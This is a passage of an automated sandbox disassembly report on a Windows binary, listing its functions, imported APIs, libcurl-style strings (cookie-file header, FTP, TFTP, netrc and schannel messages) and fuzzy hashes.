                                    • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,00000004,00E20B10), ref: 00E2105E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E210A0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E210C0
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50,00000000,00E2182F), ref: 00E210CA
                                      • Part of subcall function 00E350DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 00E3510A
                                      • Part of subcall function 00E350DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 00E35118
                                      • Part of subcall function 00E350DE: MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 00E35166
                                      • Part of subcall function 00E350DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E35175
                                      • Part of subcall function 00E350DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35181
                                    • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50,00000000,00E2182F), ref: 00E210E0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50,00000000,00E2182F), ref: 00E210FA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50,00000000,00E2182F), ref: 00E2113C
                                    Strings
                                    • # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00E20FE8
                                    • %s, xrefs: 00E21083
                                    • %s.%s.tmp, xrefs: 00E20FB2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdup$FileMove__acrt_iob_func_time64_unlinkcallocfclosefopenfputsqsort
                                    • String ID: # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                    • API String ID: 2634863294-1951421411
                                    • Opcode ID: 4c87ccc891fdd7cc9023f6685d79fc8b3d692b938ab679f43a81eb227d967b7c
                                    • Instruction ID: a03da1c419765835697a33d7a4dda2db85b632d6387242651839c0519d0a142c
                                    • Opcode Fuzzy Hash: 4c87ccc891fdd7cc9023f6685d79fc8b3d692b938ab679f43a81eb227d967b7c
                                    • Instruction Fuzzy Hash: 35512332A04329DFDF149F65FC55ABEBBB4EF48750F14106AE901B7291CBB09D458BA0
                                    Function 00E3B8E9 Relevance: 26.6, APIs: 4, Strings: 11, Instructions: 364COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3B935
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3B962
                                      • Part of subcall function 00E03857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00E03872
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3BC25
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3BD5A
                                    Strings
                                    • Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 00E3BAFB
                                    • %u.%u.%u.%u, xrefs: 00E3BB34
                                    • Bad PASV/EPSV response: %03d, xrefs: 00E3BDB8
                                    • Weirdly formatted EPSV reply, xrefs: 00E3BA0D
                                    • %c%c%c%u%c, xrefs: 00E3B98D
                                    • Couldn't interpret the 227-response, xrefs: 00E3BDA6
                                    • %u,%u,%u,%u,%u,%u, xrefs: 00E3BA7C
                                    • Illegal port number in EPSV reply, xrefs: 00E3B9C2
                                    • Connecting to %s (%s) port %d, xrefs: 00E3BD2E
                                    • Can't resolve proxy host %s:%hu, xrefs: 00E3BBCF
                                    • Can't resolve new host %s:%hu, xrefs: 00E3BCA4
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr__stdio_common_vsscanf
                                    • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                    • API String ID: 2616960956-1503635593
                                    • Opcode ID: 3cdb1eae4dd346a59d87124c2d3216ddd8a71f7b9c46e10302fa8a26af8e553c
                                    • Instruction ID: 9a82cb13231fbbf28c9c5db80ac1cedd543223b79361dc853ba777154da46680
                                    • Opcode Fuzzy Hash: 3cdb1eae4dd346a59d87124c2d3216ddd8a71f7b9c46e10302fa8a26af8e553c
                                    • Instruction Fuzzy Hash: C9D1D371A08702AFDB149F24D848BAAFBD4FF84314F00692EF646B3291DB74D814CB96
                                    Function 00E38B9D Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 346fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E38C37
                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,00000000), ref: 00E38C5B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38D7D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38E2E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38F8D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38FA8
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E38FB1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E39015
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3904B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$fclosefgetsfopen
                                    • String ID: $default$login$macdef$machine$password
                                    • API String ID: 1690894011-416575051
                                    • Opcode ID: 726d5e723dbe7f35698ab5c49faafd9f95aaba6c5c8749820e373cbe8b17ecd6
                                    • Instruction ID: a9231acca401f7c1949ac65440eb08560679f2e01fa6226c604b83deb221b862
                                    • Opcode Fuzzy Hash: 726d5e723dbe7f35698ab5c49faafd9f95aaba6c5c8749820e373cbe8b17ecd6
                                    • Instruction Fuzzy Hash: 22D1D731A043A88BDB358B249D583E9BFB69F55354F1450DAE489B3291CFF48EC8CB51
                                    Function 00E31C9A Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 166COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31CC2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31D16
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31D81
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E31DAF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31DD1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr
                                    • String ID: Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s$P$TQ$TQ$XQ$XQ
                                    • API String ID: 622630536-1613839964
                                    • Opcode ID: 3e8a17e662472a4769f98091efabfc31101635d5d959bf8e63ae1aa77b68678b
                                    • Instruction ID: 49dd9078acfbe17bb27c27be67b2ccc66c5a2e786eeefc398f9598f91d903900
                                    • Opcode Fuzzy Hash: 3e8a17e662472a4769f98091efabfc31101635d5d959bf8e63ae1aa77b68678b
                                    • Instruction Fuzzy Hash: 29514672704601AFDB099F25EC487B57F95EF46355F18A1BEDC05AB252CB719C04CBA0
                                    Function 00E25106 Relevance: 25.3, APIs: 20, Instructions: 257COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25157
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2516E
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00E21751,?,00000000,?,?,?,00E08BF9), ref: 00E26D39
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E26D52
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08BF9), ref: 00E26D69
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E08BF9), ref: 00E26D80
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26D97
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DAE
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DC5
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DDC
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DF3
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E0A
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E21
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E38
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E4F
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E66
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E251A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E251C2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25219
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25237
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25255
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25273
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E252DF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E252FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2531B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25339
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25356
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25370
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E253B9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2542A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25449
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25466
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25483
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E254AD
                                      • Part of subcall function 00E1E574: getsockname.WS2_32(?,?,?), ref: 00E1E5C6
                                      • Part of subcall function 00E1E574: WSAGetLastError.WS2_32(?,?,?), ref: 00E1E5D0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$ErrorLastgetsockname
                                    • String ID:
                                    • API String ID: 3375700865-0
                                    • Opcode ID: 49ffed737606cd81539e9bbf5ec114d6216fc48e59e76181788ef13b10748e90
                                    • Instruction ID: 5ec9f8a8de19d13aca196eccf455e688b82f9bab36cd031b05605c17d2bffd9b
                                    • Opcode Fuzzy Hash: 49ffed737606cd81539e9bbf5ec114d6216fc48e59e76181788ef13b10748e90
                                    • Instruction Fuzzy Hash: E5B14B32A14615DFDF099F25F884799BBA1FF48351F14817AEC09AB266CBB42C18CF90
                                    Function 00E21EF9 Relevance: 25.2, APIs: 20, Instructions: 164COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E21F12
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21F31
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21F4E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21F6B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21F88
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21FA5
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00E21751,?,00000000,?,?,?,00E08BF9), ref: 00E26D39
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E26D52
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08BF9), ref: 00E26D69
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E08BF9), ref: 00E26D80
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26D97
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DAE
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DC5
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DDC
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DF3
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E0A
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E21
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E38
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E4F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21FCD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21FEA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22007
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22024
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22041
                                      • Part of subcall function 00E1D126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1D13A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22066
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2207D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22094
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E220AB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E220C5
                                      • Part of subcall function 00E21DD7: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21DFA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22102
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E66
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2212A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22147
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2215F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: aea95a0ea428f24bc1cd0f4077647e09235f7caa3b1a27ced1294ab336dc4f20
                                    • Instruction ID: 9d7b010c973cae94884a23cec79a78c40576d6f46bc3db266d66a18256916180
                                    • Opcode Fuzzy Hash: aea95a0ea428f24bc1cd0f4077647e09235f7caa3b1a27ced1294ab336dc4f20
                                    • Instruction Fuzzy Hash: 2D61AA76A14A26EFCB0D6F35FC5459DFBA5FF48251B10852BD416A3261CBB82C188F90
                                    Function 00E37979 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 310COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E37B0C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
                                    • API String ID: 1294909896-119092532
                                    • Opcode ID: 589b9f61699c15c6c86f39df7d45962c048cbd8e9e436ee07de07816197763d9
                                    • Instruction ID: 15bb96f579d0b1a4abef669dcb0db1e4c70032a8bc70aef7b3acdfcbac755228
                                    • Opcode Fuzzy Hash: 589b9f61699c15c6c86f39df7d45962c048cbd8e9e436ee07de07816197763d9
                                    • Instruction Fuzzy Hash: BCB104B16087059FDB38DF68DC89BE9BBE5AF45308F005598E48DB7291DA71AD48CB80
                                    Function 00E451EC Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 285encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E2720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00E21751,?,00000000,?,?,?,00E08BF9), ref: 00E2724B
                                      • Part of subcall function 00E2720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E27261
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E45531
                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00E45587
                                    Strings
                                    • ALPN: server accepted %.*s, xrefs: 00E45335
                                    • schannel: failed to retrieve remote cert context, xrefs: 00E455B3
                                    • schannel: failed to setup memory allocation, xrefs: 00E452B4
                                    • schannel: failed to setup stream orientation, xrefs: 00E452CB
                                    • schannel: failed to setup confidentiality, xrefs: 00E4529D
                                    • schannel: failed to setup replay detection, xrefs: 00E45289
                                    • schannel: failed to setup sequence detection, xrefs: 00E45275
                                    • schannel: failed to store credential handle, xrefs: 00E45490
                                    • ALPN: server did not agree on a protocol. Uses default., xrefs: 00E45377
                                    • /1.1, xrefs: 00E4535B
                                    • http, xrefs: 00E45352
                                    • schannel: failed to retrieve ALPN result, xrefs: 00E45316
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$CertCertificateContextFreecalloc
                                    • String ID: /1.1$ALPN: server accepted %.*s$ALPN: server did not agree on a protocol. Uses default.$http$schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle
                                    • API String ID: 219865100-3105508259
                                    • Opcode ID: ec350d50adc612461dc69f892153973d6c3bec130c6a4d5cb9a0dad82178003c
                                    • Instruction ID: d215ca5742b900a53d10a2722328f8999d7277070335ab3ded20212b427344bf
                                    • Opcode Fuzzy Hash: ec350d50adc612461dc69f892153973d6c3bec130c6a4d5cb9a0dad82178003c
                                    • Instruction Fuzzy Hash: D9B12532A046149FDB24DB14EC81BEDB3F4AB49314F1411EAE449BB283DBB4AD80CF81
                                    Function 00E0F7FA Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 281stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0F866
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E0F87A
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0F886
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0F9A0
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E0F9AF
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0F9BB
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0FA09
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E0FA18
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0FA24
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0FA39
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E0FA48
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0FA54
                                      • Part of subcall function 00E03857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00E03872
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$strtoul$__stdio_common_vsscanf
                                    • String ID: %c-%c%c$0kv@qv@/lv
                                    • API String ID: 3842623485-2273544561
                                    • Opcode ID: aff01bdcfb61c8d902d106b534509f7041f9df8e2be13946b41f3c198c39002e
                                    • Instruction ID: 2523a47695fcd340b0e0449f79a031c7f6bb98654cfa327bbfc3c2d496943707
                                    • Opcode Fuzzy Hash: aff01bdcfb61c8d902d106b534509f7041f9df8e2be13946b41f3c198c39002e
                                    • Instruction Fuzzy Hash: F0B1DE71A002059FCB25CF68C8906EDBBB5BF85308F2890B9D849BB695D7319D95CB60
                                    Function 00E4D19B Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203COMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB20
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB42
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB9C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D01D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D033
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$callocmallocrealloc
                                    • String ID: $ $ $ $ $ $.$.$:
                                    • API String ID: 4199894680-3908554926
                                    • Opcode ID: 664ff76814b9c64870fc6d01f99af4fa78b29289a3733b9367086f8497dd949b
                                    • Instruction ID: e020cc1a5a2c64eb7e047f9a05ac8c63dc4ec2b84065d9058a0bdf9034af2075
                                    • Opcode Fuzzy Hash: 664ff76814b9c64870fc6d01f99af4fa78b29289a3733b9367086f8497dd949b
